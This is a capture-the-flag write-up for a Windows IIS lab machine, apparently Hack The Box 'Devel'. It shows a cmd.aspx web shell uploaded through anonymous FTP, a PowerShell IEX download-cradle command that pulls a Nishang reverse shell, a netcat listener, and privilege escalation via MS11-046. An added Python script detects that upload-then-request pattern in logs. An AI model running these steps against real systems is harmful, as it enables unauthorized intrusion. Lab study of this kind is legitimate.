This is the second time I do this, but this time without Metasploit.

The first thing we notice from the nmap scan is that FTP is open with anonymous access, and ASP

root@Kali2:~/Downloads# nmap -sC -sV -O
Starting Nmap 7.70 ( ) at 2019-11-03 19:39 CET
Nmap scan report for
Host is up (0.022s latency).
Not shown: 998 filtered ports
21/tcp open  ftp 	Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM   	<DIR>      	aspnet_client
| 03-17-17  04:37PM              	689 iisstart.htm
|_03-17-17  04:37PM           	184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http	Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 22.73 seconds

Since the machine was very slow, instead of connecting over FTP I went in with FileZilla.

I uploaded the shell that is in Kali

root@Kali2:~/Desktop# locate cmd.aspx

And you can reach it from the browser at

From there, the usual. Nishang

powershell.exe IEX(New-Object Net.WebClient).downloadString('')
root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 49167
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>
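
Seen from the defender's side, the foothold above is an anonymous FTP upload of a server-executable file followed by an HTTP request for that same file. The Python below is an added example, not part of the original write-up: it correlates the two events across W3C extended logs. The log lines are constructed, and the `ANON_USERS` names and the FTP root being the web root are assumptions.

```python
import os

# Constructed sample logs in W3C extended format (documentation-range addresses).
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2019-11-03 18:41:09 203.0.113.7 anonymous STOR /cmd.aspx 226
2019-11-03 18:41:30 203.0.113.7 anonymous STOR /notes.txt 226
2019-11-03 18:50:00 198.51.100.4 webadmin STOR /default.aspx 226
"""
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2019-11-03 18:40:11 203.0.113.7 GET /iisstart.htm 200
2019-11-03 18:42:15 203.0.113.7 GET /cmd.aspx 200
2019-11-03 18:51:00 198.51.100.9 GET /default.aspx 200
"""
EXECUTABLE_EXT = {".asp", ".aspx", ".ashx", ".asmx"}  # extensions IIS hands to a handler
ANON_USERS = {"anonymous", "ftp"}  # assumption: how the FTP log names anonymous sessions

def parse_w3c(text):
    """Yield one dict per log entry, taking column names from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_upload_then_request(ftp_text, http_text):
    """Anonymous uploads of executable files later requested over HTTP (FTP root = web root)."""
    uploads = {}
    for e in parse_w3c(ftp_text):
        path = e["cs-uri-stem"].lower()
        if (e["cs-method"].upper() == "STOR" and e["sc-status"].startswith("2")
                and e["cs-username"].lower() in ANON_USERS
                and os.path.splitext(path)[1] in EXECUTABLE_EXT):
            uploads.setdefault(path, e)  # keep the first upload of each path
    hits = []
    for e in parse_w3c(http_text):
        up = uploads.get(e["cs-uri-stem"].lower())
        stamp = e["date"] + " " + e["time"]  # ISO-style stamps compare correctly as strings
        if up and stamp >= up["date"] + " " + up["time"]:
            hits.append({"path": e["cs-uri-stem"], "uploaded_by": up["c-ip"],
                         "uploaded_at": up["date"] + " " + up["time"],
                         "requested_by": e["c-ip"], "requested_at": stamp})
    return hits

if __name__ == "__main__":
    for hit in find_upload_then_request(FTP_LOG, HTTP_LOG):
        print(hit)
```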

With systeminfo

PS C:\windows\system32\inetsrv> systeminfo

Host Name:             	DEVEL
OS Name:               	Microsoft Windows 7 Enterprise
OS Version:            	6.1.7600 N/A Build 7600
OS Manufacturer:       	Microsoft Corporation
OS Configuration:      	Standalone Workstation
OS Build Type:         	Multiprocessor Free
Registered Owner:      	babis
Registered Organization:   
Product ID:            	55041-051-0948536-86302
Original Install Date: 	17/3/2017, 4:17:31 ??
System Boot Time:      	7/11/2019, 4:33:20 ??
System Manufacturer:   	VMware, Inc.
System Model:          	VMware Virtual Platform
System Type:           	X86-based PC
Processor(s):          	1 Processor(s) Installed.
                       	[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:          	Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:     	C:\Windows
System Directory:      	C:\Windows\system32
Boot Device:           	\Device\HarddiskVolume1
System Locale:         	el;Greek
Input Locale:          	en-us;English (United States)
Time Zone:             	(UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 	1.023 MB
Available Physical Memory: 689 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.458 MB
Virtual Memory: In Use:	589 MB
Page File Location(s): 	C:\pagefile.sys
Domain:                	HTB
Logon Server:          	N/A
Hotfix(s):             	N/A
Network Card(s):       	1 NIC(s) Installed.
                       	[01]: Intel(R) PRO/1000 MT Network Connection
                             	Connection Name: Local Area Connection
                             	DHCP Enabled:	No
                             	IP address(es)

We see that it is exactly the same as Arctic, so we can do priv esc with Chimichurri or with MS11-046.
Just running it gives me a shell.